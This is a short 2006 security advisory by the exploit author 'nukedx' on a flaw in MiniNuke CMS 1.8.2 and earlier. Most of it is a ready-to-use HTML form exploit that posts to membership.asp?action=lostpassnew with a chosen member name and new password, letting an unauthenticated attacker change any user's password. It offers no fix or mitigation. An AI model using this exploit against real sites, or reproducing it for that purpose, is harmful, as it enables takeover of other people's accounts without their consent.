MiniNukeSQL-2.txt

`--Security Report--  
Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password  
change exploit  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 12/01/06 08:49 PM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: [email protected]  
Web: http://www.nukedx.com  
}  
---  
Vendor: MiniNuke (www.miniex.net)  
Version: 1.8.2 and prior versions must be affected.  
About:Via this method remote attacker can change any users password without  
login.  
---  
How&Example:  
HTML Example  
[code]  
<html>  
<title>MiniNuke <= 1.8.2 remote user password change</title>  
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">  
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">  
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the  
blanks</font></td></tr>  
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password  
</font></td></tr>  
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD:  
</font></td>  
<td width="50%"><input type="text" name="pass" size="20"></td></tr>  
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again :  
</font></td>  
<td width="50%"><input type="text" name="passa" size="20"><input type="text"  
name="x" value="Membername">&nbsp;&nbsp;  
<input type="submit" value="Send" name="B1" style="font-family: Verdana;  
font-size: 10px; border: 1px ridge #FFFFFF; background-color:  
#FFFFFF"></td></tr>  
</table></form>  
</html>  
[/code]  
--  
Regards,  
From the NWPX team,  
nuker a.k.a nukedx  
  
  
  
`